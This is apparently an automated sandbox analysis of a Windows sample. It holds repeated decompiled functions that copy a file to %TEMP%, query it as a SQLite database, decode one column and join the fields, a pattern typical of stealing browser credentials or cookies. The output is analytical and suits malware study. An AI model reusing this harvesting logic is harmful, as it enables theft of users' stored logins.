				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v117;
				signed int _t66;
				signed int _t67;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t138;
				intOrPtr* _t142;
				intOrPtr _t144;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr* _t150;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t161;
				intOrPtr* _t167;
				intOrPtr* _t173;
				void* _t175;
				intOrPtr* _t179;
				void* _t183;
				intOrPtr _t204;
				intOrPtr _t206;
				void* _t211;
				intOrPtr _t217;
				intOrPtr _t221;
				intOrPtr _t222;
				void* _t223;
				void* _t224;

				_t219 = __esi;
				_t181 = __ebx;
				_pop(_t222);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t66 = __eax;
				 *_t66 =  *_t66 + _t66;
				_t67 = _t66 | 0x00000a00;
				 *_t67 =  *_t67 + _t67;
				_v117 = _v117 + __edx;
				_t221 = _t222;
				_t183 = 0xa;
				do {
					_push(0);
					_push(0);
					_t183 = _t183 - 1;
					_t232 = _t183;
				} while (_t183 != 0);
				_push(_t183);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t67;
				E00404150( &_v8);
				_push(_t221);
				_push(0x4115ab);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222;
				E00403BDC( &_v28);
				_push(_t221);
				_push(0x411526);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222;
				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t232);
				_push(_v52);
				E00406FDC( &_v56, __ebx, __edi, __esi, _t232);
				_push(_v56);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t181,  &_v40, _t232);
				E004062FC(L"%TEMP%",  &_v64, _t232);
				_push(_v64);
				_push(0x4115e4);
				_push(_v32);
				E00403E78();
				E004078D8(_v60, _t181,  &_v44, _t232);
				_t87 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404B58(_v68, _t181, _t183,  &_v36, _t219, _t232);
				E00403D88( &_v72, _v36);
				if(E0040776C(_v72, _t181, _t183) != 0) {
					_t102 =  *0x41b140; // 0x41ca20
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t223 = _t222 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						_t138 =  *0x41b390; // 0x41c934
						_t142 =  *0x41b2d4; // 0x41ca28
						_t144 =  *((intOrPtr*)( *_t142))(_v16, E00403990( *_t138), 0xffffffff,  &_v20,  &_v24);
						_t224 = _t223 + 0x14;
						__eflags = _t144;
						if(_t144 == 0) {
							while(1) {
								_t146 =  *0x41b384; // 0x41ca2c
								_t148 =  *((intOrPtr*)( *_t146))(_v20);
								__eflags = _t148 - 0x64;
								if(_t148 != 0x64) {
									goto L12;
								}
								_t150 =  *0x41b414; // 0x41ca34
								_t154 =  *0x41b1dc; // 0x41ca30
								_t156 =  *((intOrPtr*)( *_t154))(_v20, 3,  *((intOrPtr*)( *_t150))(_v20, 3));
								_pop(_t211);
								E0040A610(_t156,  &_v48, _t211);
								E00403D88( &_v76, _v48);
								_t161 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v80,  *((intOrPtr*)( *_t161))(_v20, 0, 0x4115ec, _v76, _v28));
								_t167 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v84,  *((intOrPtr*)( *_t167))(_v20, 1, 0x4115ec, _v80));
								_t173 =  *0x41b1dc; // 0x41ca30
								_t175 =  *((intOrPtr*)( *_t173))(_v20, 2, 0x4115f8, _v84);
								_t224 = _t224 + 0x28;
								E00403CF4( &_v88, _t175);
								_push(_v88);
								_push(L"\r\n\r\n");
								E00403E78();
								_t179 =  *0x41b1cc; // 0x41b0b4
								 *_t179 =  *_t179 + 1;
								__eflags =  *_t179;
							}
						}
					}
					L12:
					_t106 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t204);
					 *[fs:eax] = _t204;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t217);
					 *[fs:eax] = _t217;
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E004115B2);
				E00403BF4( &_v88, 5);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 2);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x004112b8
0x004112b8
0x004112b8
0x004112b9
0x004112bb
0x004112bd
0x004112bf
0x004112c0
0x004112c2
0x004112c4
0x004112c6
0x004112c8
0x004112cd
0x004112cf
0x004112d1
0x004112d3
0x004112d8
0x004112d8
0x004112da
0x004112dc
0x004112dc
0x004112dc
0x004112df
0x004112e0
0x004112e1
0x004112e2
0x004112e3
0x004112e6
0x004112ec
0x004112f3
0x004112f4
0x004112f9
0x004112fc
0x00411302
0x00411309
0x0041130a
0x0041130f
0x00411312
0x0041131d
0x00411322
0x00411328
0x0041132d
0x00411330
0x0041133d
0x00411348
0x00411355
0x0041135a
0x0041135d
0x00411362
0x0041136d
0x00411378
0x00411382
0x00411391
0x0041139c
0x004113a7
0x004113b2
0x004113c1
0x004113dd
0x004113e4
0x004113e6
0x004113e9
0x004113eb
0x004113fb
0x0041140c
0x00411413
0x00411415
0x00411418
0x0041141a
0x004114e9
0x004114ed
0x004114f4
0x004114f7
0x004114fa
0x00000000
0x00000000
0x0041142b
0x0041143e
0x00411445
0x0041144d
0x0041144e
0x0041145c
0x0041146f
0x00411480
0x00411493
0x004114a4
0x004114b7
0x004114be
0x004114c0
0x004114c8
0x004114cd
0x004114d0
0x004114dd
0x004114e2
0x004114e7
0x004114e7
0x004114e7
0x004114e9
0x0041141a
0x00411500
0x00411504
0x0041150b
0x00411512
0x00411519
0x0041151e
0x00411521
0x00411536
0x00411544
0x004113c3
0x004113c5
0x004113c8
0x004113c8
0x0041154b
0x0041154e
0x00411551
0x0041155e
0x00411566
0x00411573
0x0041157b
0x00411588
0x00411590
0x0041159d
0x004115aa

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: f6c8deb41282be5770c048f0b97447003eceaaf2e792347eab8b86e35438337d
Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
Opcode Fuzzy Hash: f6c8deb41282be5770c048f0b97447003eceaaf2e792347eab8b86e35438337d
Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25

Uniqueness

Uniqueness Score: -1.00%

Function 004112C0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113
fileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E004112C0(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v117;
				signed int _t66;
				signed int _t67;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t138;
				intOrPtr* _t142;
				intOrPtr _t144;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr* _t150;
				intOrPtr* _t154;
				void* _t156;
				intOrPtr* _t161;
				intOrPtr* _t167;
				intOrPtr* _t173;
				void* _t175;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr _t203;
				intOrPtr _t205;
				void* _t210;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				void* _t223;

				_t218 = __esi;
				_t181 = __ebx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t66 = __eax;
				 *_t66 =  *_t66 + _t66;
				_t67 = _t66 | 0x00000a00;
				 *_t67 =  *_t67 + _t67;
				_v117 = _v117 + __edx;
				_t220 = _t221;
				_t182 = 0xa;
				do {
					_push(0);
					_push(0);
					_t182 = _t182 - 1;
					_t230 = _t182;
				} while (_t182 != 0);
				_push(_t182);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t67;
				E00404150( &_v8);
				_push(_t220);
				_push(0x4115ab);
				_push( *[fs:eax]);
				 *[fs:eax] = _t221;
				E00403BDC( &_v28);
				_push(_t220);
				_push(0x411526);
				_push( *[fs:eax]);
				 *[fs:eax] = _t221;
				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t230);
				_push(_v52);
				E00406FDC( &_v56, __ebx, __edi, __esi, _t230);
				_push(_v56);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t181,  &_v40, _t230);
				E004062FC(L"%TEMP%",  &_v64, _t230);
				_push(_v64);
				_push(0x4115e4);
				_push(_v32);
				E00403E78();
				E004078D8(_v60, _t181,  &_v44, _t230);
				_t87 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404B58(_v68, _t181, _t182,  &_v36, _t218, _t230);
				E00403D88( &_v72, _v36);
				if(E0040776C(_v72, _t181, _t182) != 0) {
					_t102 =  *0x41b140; // 0x41ca20
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t222 = _t221 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						_t138 =  *0x41b390; // 0x41c934
						_t142 =  *0x41b2d4; // 0x41ca28
						_t144 =  *((intOrPtr*)( *_t142))(_v16, E00403990( *_t138), 0xffffffff,  &_v20,  &_v24);
						_t223 = _t222 + 0x14;
						__eflags = _t144;
						if(_t144 == 0) {
							while(1) {
								_t146 =  *0x41b384; // 0x41ca2c
								_t148 =  *((intOrPtr*)( *_t146))(_v20);
								__eflags = _t148 - 0x64;
								if(_t148 != 0x64) {
									goto L11;
								}
								_t150 =  *0x41b414; // 0x41ca34
								_t154 =  *0x41b1dc; // 0x41ca30
								_t156 =  *((intOrPtr*)( *_t154))(_v20, 3,  *((intOrPtr*)( *_t150))(_v20, 3));
								_pop(_t210);
								E0040A610(_t156,  &_v48, _t210);
								E00403D88( &_v76, _v48);
								_t161 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v80,  *((intOrPtr*)( *_t161))(_v20, 0, 0x4115ec, _v76, _v28));
								_t167 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v84,  *((intOrPtr*)( *_t167))(_v20, 1, 0x4115ec, _v80));
								_t173 =  *0x41b1dc; // 0x41ca30
								_t175 =  *((intOrPtr*)( *_t173))(_v20, 2, 0x4115f8, _v84);
								_t223 = _t223 + 0x28;
								E00403CF4( &_v88, _t175);
								_push(_v88);
								_push(L"\r\n\r\n");
								E00403E78();
								_t179 =  *0x41b1cc; // 0x41b0b4
								 *_t179 =  *_t179 + 1;
								__eflags =  *_t179;
							}
						}
					}
					L11:
					_t106 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t203);
					 *[fs:eax] = _t203;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t216);
					 *[fs:eax] = _t216;
				}
				_pop(_t205);
				 *[fs:eax] = _t205;
				_push(E004115B2);
				E00403BF4( &_v88, 5);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 2);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x004112c0
0x004112c0
0x004112c0
0x004112c2
0x004112c4
0x004112c6
0x004112c8
0x004112cd
0x004112cf
0x004112d1
0x004112d3
0x004112d8
0x004112d8
0x004112da
0x004112dc
0x004112dc
0x004112dc
0x004112df
0x004112e0
0x004112e1
0x004112e2
0x004112e3
0x004112e6
0x004112ec
0x004112f3
0x004112f4
0x004112f9
0x004112fc
0x00411302
0x00411309
0x0041130a
0x0041130f
0x00411312
0x0041131d
0x00411322
0x00411328
0x0041132d
0x00411330
0x0041133d
0x00411348
0x00411355
0x0041135a
0x0041135d
0x00411362
0x0041136d
0x00411378
0x00411382
0x00411391
0x0041139c
0x004113a7
0x004113b2
0x004113c1
0x004113dd
0x004113e4
0x004113e6
0x004113e9
0x004113eb
0x004113fb
0x0041140c
0x00411413
0x00411415
0x00411418
0x0041141a
0x004114e9
0x004114ed
0x004114f4
0x004114f7
0x004114fa
0x00000000
0x00000000
0x0041142b
0x0041143e
0x00411445
0x0041144d
0x0041144e
0x0041145c
0x0041146f
0x00411480
0x00411493
0x004114a4
0x004114b7
0x004114be
0x004114c0
0x004114c8
0x004114cd
0x004114d0
0x004114dd
0x004114e2
0x004114e7
0x004114e7
0x004114e7
0x004114e9
0x0041141a
0x00411500
0x00411504
0x0041150b
0x00411512
0x00411519
0x0041151e
0x00411521
0x00411536
0x00411544
0x004113c3
0x004113c5
0x004113c8
0x004113c8
0x0041154b
0x0041154e
0x00411551
0x0041155e
0x00411566
0x00411573
0x0041157b
0x00411588
0x00411590
0x0041159d
0x004115aa

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 4109a64c4e7ebea2bd269ab7f72adf152baa53bf738e560ef77c239433b323f7
Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
Opcode Fuzzy Hash: 4109a64c4e7ebea2bd269ab7f72adf152baa53bf738e560ef77c239433b323f7
Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24

Uniqueness

Uniqueness Score: -1.00%

Function 004112C8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004112C8(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				intOrPtr _v117;
				signed int _t66;
				WCHAR* _t86;
				intOrPtr* _t101;
				intOrPtr _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t137;
				intOrPtr* _t141;
				intOrPtr _t143;
				intOrPtr* _t145;
				void* _t147;
				intOrPtr* _t149;
				intOrPtr* _t153;
				void* _t155;
				intOrPtr* _t160;
				intOrPtr* _t166;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr* _t178;
				void* _t181;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t209;
				intOrPtr _t215;
				intOrPtr _t219;
				intOrPtr _t220;
				void* _t221;
				void* _t222;

				_t217 = __esi;
				_t180 = __ebx;
				_t66 = __eax | 0x00000a00;
				 *_t66 =  *_t66 + _t66;
				_v117 = _v117 + __edx;
				_t219 = _t220;
				_t181 = 0xa;
				do {
					_push(0);
					_push(0);
					_t181 = _t181 - 1;
					_t228 = _t181;
				} while (_t181 != 0);
				_push(_t181);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t66;
				E00404150( &_v8);
				_push(_t219);
				_push(0x4115ab);
				_push( *[fs:eax]);
				 *[fs:eax] = _t220;
				E00403BDC( &_v28);
				_push(_t219);
				_push(0x411526);
				_push( *[fs:eax]);
				 *[fs:eax] = _t220;
				E0040709C(GetTickCount(), __ebx,  &_v52, __esi, _t228);
				_push(_v52);
				E00406FDC( &_v56, __ebx, __edi, __esi, _t228);
				_push(_v56);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t180,  &_v40, _t228);
				E004062FC(L"%TEMP%",  &_v64, _t228);
				_push(_v64);
				_push(0x4115e4);
				_push(_v32);
				E00403E78();
				E004078D8(_v60, _t180,  &_v44, _t228);
				_t86 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404B58(_v68, _t180, _t181,  &_v36, _t217, _t228);
				E00403D88( &_v72, _v36);
				if(E0040776C(_v72, _t180, _t181) != 0) {
					_t101 =  *0x41b140; // 0x41ca20
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t221 = _t220 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t137 =  *0x41b390; // 0x41c934
						_t141 =  *0x41b2d4; // 0x41ca28
						_t143 =  *((intOrPtr*)( *_t141))(_v16, E00403990( *_t137), 0xffffffff,  &_v20,  &_v24);
						_t222 = _t221 + 0x14;
						__eflags = _t143;
						if(_t143 == 0) {
							while(1) {
								_t145 =  *0x41b384; // 0x41ca2c
								_t147 =  *((intOrPtr*)( *_t145))(_v20);
								__eflags = _t147 - 0x64;
								if(_t147 != 0x64) {
									goto L10;
								}
								_t149 =  *0x41b414; // 0x41ca34
								_t153 =  *0x41b1dc; // 0x41ca30
								_t155 =  *((intOrPtr*)( *_t153))(_v20, 3,  *((intOrPtr*)( *_t149))(_v20, 3));
								_pop(_t209);
								E0040A610(_t155,  &_v48, _t209);
								E00403D88( &_v76, _v48);
								_t160 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v80,  *((intOrPtr*)( *_t160))(_v20, 0, 0x4115ec, _v76, _v28));
								_t166 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v84,  *((intOrPtr*)( *_t166))(_v20, 1, 0x4115ec, _v80));
								_t172 =  *0x41b1dc; // 0x41ca30
								_t174 =  *((intOrPtr*)( *_t172))(_v20, 2, 0x4115f8, _v84);
								_t222 = _t222 + 0x28;
								E00403CF4( &_v88, _t174);
								_push(_v88);
								_push(L"\r\n\r\n");
								E00403E78();
								_t178 =  *0x41b1cc; // 0x41b0b4
								 *_t178 =  *_t178 + 1;
								__eflags =  *_t178;
							}
						}
					}
					L10:
					_t105 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t202);
					 *[fs:eax] = _t202;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t215);
					 *[fs:eax] = _t215;
				}
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(E004115B2);
				E00403BF4( &_v88, 5);
				E004034E4( &_v68);
				E00403BF4( &_v64, 4);
				E004034E4( &_v48);
				E00403BF4( &_v44, 2);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x004112c8
0x004112c8
0x004112c8
0x004112cd
0x004112cf
0x004112d1
0x004112d3
0x004112d8
0x004112d8
0x004112da
0x004112dc
0x004112dc
0x004112dc
0x004112df
0x004112e0
0x004112e1
0x004112e2
0x004112e3
0x004112e6
0x004112ec
0x004112f3
0x004112f4
0x004112f9
0x004112fc
0x00411302
0x00411309
0x0041130a
0x0041130f
0x00411312
0x0041131d
0x00411322
0x00411328
0x0041132d
0x00411330
0x0041133d
0x00411348
0x00411355
0x0041135a
0x0041135d
0x00411362
0x0041136d
0x00411378
0x00411382
0x00411391
0x0041139c
0x004113a7
0x004113b2
0x004113c1
0x004113dd
0x004113e4
0x004113e6
0x004113e9
0x004113eb
0x004113fb
0x0041140c
0x00411413
0x00411415
0x00411418
0x0041141a
0x004114e9
0x004114ed
0x004114f4
0x004114f7
0x004114fa
0x00000000
0x00000000
0x0041142b
0x0041143e
0x00411445
0x0041144d
0x0041144e
0x0041145c
0x0041146f
0x00411480
0x00411493
0x004114a4
0x004114b7
0x004114be
0x004114c0
0x004114c8
0x004114cd
0x004114d0
0x004114dd
0x004114e2
0x004114e7
0x004114e7
0x004114e7
0x004114e9
0x0041141a
0x00411500
0x00411504
0x0041150b
0x00411512
0x00411519
0x0041151e
0x00411521
0x00411536
0x00411544
0x004113c3
0x004113c5
0x004113c8
0x004113c8
0x0041154b
0x0041154e
0x00411551
0x0041155e
0x00411566
0x00411573
0x0041157b
0x00411588
0x00411590
0x0041159d
0x004115aa

APIs

GetTickCount.KERNEL32 ref: 00411315
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391

Strings

.tmp, xrefs: 00411330
%TEMP%, xrefs: 00411350

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: bd55e28a2ebad2aea21c6941145fc2ef948e992f272b45b9c354dd56caf94c7c
Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
Opcode Fuzzy Hash: bd55e28a2ebad2aea21c6941145fc2ef948e992f272b45b9c354dd56caf94c7c
Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14

Uniqueness

Uniqueness Score: -1.00%

Function 0041102C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0041102C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				signed int _t53;
				signed int _t54;
				WCHAR* _t74;
				intOrPtr* _t89;
				void* _t91;
				intOrPtr* _t93;
				intOrPtr* _t97;
				intOrPtr* _t121;
				intOrPtr* _t125;
				void* _t127;
				intOrPtr* _t129;
				void* _t131;
				intOrPtr* _t133;
				intOrPtr* _t139;
				void* _t141;
				void* _t147;
				intOrPtr _t167;
				intOrPtr _t169;
				intOrPtr _t176;
				intOrPtr _t180;
				intOrPtr _t181;
				void* _t182;
				void* _t183;

				_t178 = __esi;
				_t146 = __ebx;
				_t53 = __eax +  *__eax;
				 *_t53 =  *_t53 + _t53;
				_t54 = _t53 | 0x5500000a;
				_t180 = _t181;
				_t147 = 9;
				do {
					_push(0);
					_push(0);
					_t147 = _t147 - 1;
					_t187 = _t147;
				} while (_t147 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t54;
				E00404150( &_v8);
				_push(_t180);
				_push(0x411282);
				_push( *[fs:eax]);
				 *[fs:eax] = _t181;
				E00403BDC( &_v28);
				_push(_t180);
				_push(0x411212);
				_push( *[fs:eax]);
				 *[fs:eax] = _t181;
				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t187);
				_push(_v48);
				E00406FDC( &_v52, __ebx, __edi, __esi, _t187);
				_push(_v52);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t146,  &_v40, _t187);
				E004062FC(L"%TEMP%",  &_v60, _t187);
				_push(_v60);
				_push(E004112B8);
				_push(_v32);
				E00403E78();
				E004078D8(_v56, _t146,  &_v44, _t187);
				_t74 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t74, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404B58(_v64, _t146, _t147,  &_v36, _t178, _t187);
				E00403D88( &_v68, _v36);
				if(E0040776C(_v68, _t146, _t147) != 0) {
					_t89 =  *0x41b140; // 0x41ca20
					_t91 =  *((intOrPtr*)( *_t89))(E00403990(_v36),  &_v16);
					_t182 = _t181 + 8;
					__eflags = _t91;
					if(_t91 == 0) {
						_t121 =  *0x41b330; // 0x41c930
						_t125 =  *0x41b2d4; // 0x41ca28
						_t127 =  *((intOrPtr*)( *_t125))(_v16, E00403990( *_t121), 0xffffffff,  &_v20,  &_v24);
						_t183 = _t182 + 0x14;
						__eflags = _t127;
						if(_t127 == 0) {
							while(1) {
								_t129 =  *0x41b384; // 0x41ca2c
								_t131 =  *((intOrPtr*)( *_t129))(_v20);
								__eflags = _t131 - 0x64;
								if(_t131 != 0x64) {
									goto L11;
								}
								_t133 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v72,  *((intOrPtr*)( *_t133))(_v20, 0, _v28));
								_t139 =  *0x41b1dc; // 0x41ca30
								_t141 =  *((intOrPtr*)( *_t139))(_v20, 1, E004112C0, _v72);
								_t183 = _t183 + 0x10;
								E00403CF4( &_v76, _t141);
								_push(_v76);
								_push(E004112C8);
								E00403E78();
							}
						}
					}
					L11:
					_t93 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t93))(_v20);
					_t97 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t97))(_v16);
					_pop(_t167);
					 *[fs:eax] = _t167;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t176);
					 *[fs:eax] = _t176;
				}
				_pop(_t169);
				 *[fs:eax] = _t169;
				_push(E00411289);
				E00403BF4( &_v76, 3);
				E004034E4( &_v64);
				E00403BF4( &_v60, 6);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x0041102c
0x0041102c
0x0041102c
0x0041102e
0x00411030
0x00411035
0x00411037
0x0041103c
0x0041103c
0x0041103e
0x00411040
0x00411040
0x00411040
0x00411043
0x00411044
0x00411045
0x00411046
0x00411049
0x0041104f
0x00411056
0x00411057
0x0041105c
0x0041105f
0x00411065
0x0041106c
0x0041106d
0x00411072
0x00411075
0x00411080
0x00411085
0x0041108b
0x00411090
0x00411093
0x004110a0
0x004110ab
0x004110b8
0x004110bd
0x004110c0
0x004110c5
0x004110d0
0x004110db
0x004110e5
0x004110f4
0x004110ff
0x0041110a
0x00411115
0x00411124
0x00411140
0x00411147
0x00411149
0x0041114c
0x0041114e
0x0041115e
0x0041116f
0x00411176
0x00411178
0x0041117b
0x0041117d
0x004111d9
0x004111dd
0x004111e4
0x004111e7
0x004111ea
0x00000000
0x00000000
0x0041118a
0x0041119b
0x004111ae
0x004111b5
0x004111b7
0x004111bf
0x004111c4
0x004111c7
0x004111d4
0x004111d4
0x004111d9
0x0041117d
0x004111ec
0x004111f0
0x004111f7
0x004111fe
0x00411205
0x0041120a
0x0041120d
0x00411222
0x00411230
0x00411126
0x00411128
0x0041112b
0x0041112b
0x00411237
0x0041123a
0x0041123d
0x0041124a
0x00411252
0x0041125f
0x00411267
0x00411274
0x00411281

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7311b6e77228ae1af996723f05f2f720d011b8d184081227477208721a99883f
Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
Opcode Fuzzy Hash: 7311b6e77228ae1af996723f05f2f720d011b8d184081227477208721a99883f
Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58

Uniqueness

Uniqueness Score: -1.00%

Function 00411030, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00411030(signed int __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
